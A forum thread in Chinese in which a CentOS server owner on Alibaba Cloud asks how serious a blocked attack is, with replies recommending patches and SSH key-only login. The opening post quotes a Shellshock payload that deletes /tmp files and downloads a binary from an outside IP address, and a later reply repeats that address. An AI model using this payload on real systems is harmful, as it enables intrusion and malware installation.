这是一个创建于 3439 天前的主题,其中的信息可能已经有所发展或是发生改变。
问题:
服务器被攻击 攻击url:
x.x.x,x/ Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://222.186.30.161:1003/ok_xiaoma_32_64 -o /tmp/c...
我的是阿里云
centos 6.5
攻击已经被阿里云给拦截了
请问严重吗,我的密码也被暴利破解过,也被阿里云给挡住了。
我该怎么做防护,杜绝这类攻击,谢谢。
 |
1
krytor OP 我给阿里云打了个电话,客服说装个杀毒软件,杀一下毒,装个安全狗啥的,好不好啊 -_-
|
 |
2
Septembers 2015-06-23 17:09:24 +08:00
@phoenixlzx archlinux 每天上去滚一次
|
 |
3
liuyi_beta 2015-06-23 17:16:50 +08:00
话说你的是Linux/Unix 系统啊,客服竟然让你安装杀毒软件。。。 及时安装补丁就好了,另外登陆只用证书就好了,关掉密码登陆,将端口改到不常用端口,网站的话可以考虑安装安全狗。
|
 |
4
pwinner 2015-06-23 17:25:48 +08:00 via Android
杀毒软件。。你在说calm av么233
只用证书登录就安全多啦 |
 |
5
virusdefender 2015-06-23 18:55:02 +08:00
这个只是扫描而已 如果服务器不存在漏洞可以不用管
|
 |
6
phy25 2015-06-23 21:03:33 +08:00
然而你暴露了一个地址 http://222.186.30.161:1003/ 可以拿它来做什么呢 :doge:
|
|
7
krytor OP @Septembers 啥意思啊
|
|
9
krytor OP @virusdefender 是给我网站上传可执行文件 ,这个 http://222.186.30.161:1003/ok_xiaoma_32_64
|
 |
11
lk09364 2015-06-23 23:10:06 +08:00
> 我该怎么做防护,杜绝这类攻击,谢谢。
上面提到了——关键字: ssh证书登录 |
Select Language